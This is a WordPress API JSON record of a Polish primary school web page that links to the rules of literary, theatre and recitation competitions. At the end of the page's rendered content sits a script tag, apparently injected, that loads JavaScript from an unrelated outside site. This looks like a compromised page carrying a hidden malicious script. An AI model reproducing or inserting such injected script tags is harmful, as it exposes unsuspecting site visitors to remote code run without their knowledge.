{"id":3391,"date":"2016-10-22T14:49:07","date_gmt":"2016-10-22T12:49:07","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=3391"},"modified":"2020-04-23T09:20:52","modified_gmt":"2020-04-23T07:20:52","slug":"regulamin-konkursow-literackich","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/regulamin-konkursow-literackich\/","title":{"rendered":"Regulamin konkurs\u00f3w literackich"},"content":{"rendered":"<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/regulamin-konkursow-literackich\/regulamin_w-pustyni_popr\/\" rel=\"attachment wp-att-3508\">Regulamin &#8222;W pustyni i w puszczy&#8221;<\/a><\/p>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/regulamin-konkursow-literackich\/karta_informacyjna_w-pustyni\/\" rel=\"attachment wp-att-3510\">Karta informacyjna &#8222;W pustyni i w puszczy&#8221;<\/a><\/p>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/regulamin-konkursow-literackich\/scan\/\" rel=\"attachment wp-att-3511\">Regulamin XIX Dolno\u015bl\u0105skiego Przegl\u0105du Form Teatralnych &#8222;F-ART&#8221;<\/a><\/p>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/regulamin-konkursow-literackich\/scan0132\/\" rel=\"attachment wp-att-3512\">Regulamin XXII Dolno\u015bl\u0105skiego Konkursu Recytatorskiego &#8222;Pegazik&#8221;<\/a><\/p>\n<p>&nbsp;<script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Regulamin &#8222;W pustyni i w puszczy&#8221; Karta informacyjna &#8222;W pustyni i w puszczy&#8221; Regulamin XIX Dolno\u015bl\u0105skiego Przegl\u0105du Form Teatralnych &#8222;F-ART&#8221; Regulamin XXII Dolno\u015bl\u0105skiego Konkursu Recytatorskiego &#8222;Pegazik&#8221; &nbsp;<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/3391"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=3391"}],"version-history":[{"count":6,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/3391\/revisions"}],"predecessor-version":[{"id":15033,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/3391\/revisions\/15033"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=3391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}